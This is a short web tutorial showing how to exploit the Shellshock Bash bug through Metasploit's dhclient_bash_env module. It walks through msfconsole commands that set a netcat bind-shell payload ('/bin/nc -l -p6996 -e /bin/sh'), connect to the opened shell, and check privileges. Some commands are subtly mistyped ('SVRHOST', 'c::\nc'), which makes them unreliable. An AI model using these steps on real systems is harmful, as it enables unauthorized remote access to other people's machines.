Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

EN | How to Hack the Shellshock Vulnerability with Metasploit Framework

What is Shellshock? 

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

How to use?

  • Start the Metasploit Framework;
msfconsole
  • Search exploit;
search shellshock
  • Run the exploit;
use auxiliary/server/dhclient/dhclient_bash_env
  • We need these parameters “CMD” , “SRVHOST” VE “NETMASK”;
info
  • To view options;
show options
  • Set the DHCP server IP. This is the SRVHOST parameter;
set SVRHOST 192.168.131.61
  • Set the CMD;
set CMD /bin/nc -l -p6996 -e /bin/sh
  •  Set the NETMASK;
set NETMASK 255.255.255.0
  • Run the module;
exploit
  • Connect to the Exploited System;
c::\nc 192.168.131.61 6996
  • Returns the network settings of the exploited Linux system;
ifconfig
  • Confirm the privilage;
    whoami

 

About Mustafa Kaan Demirhan

Security Researcher

Follow Me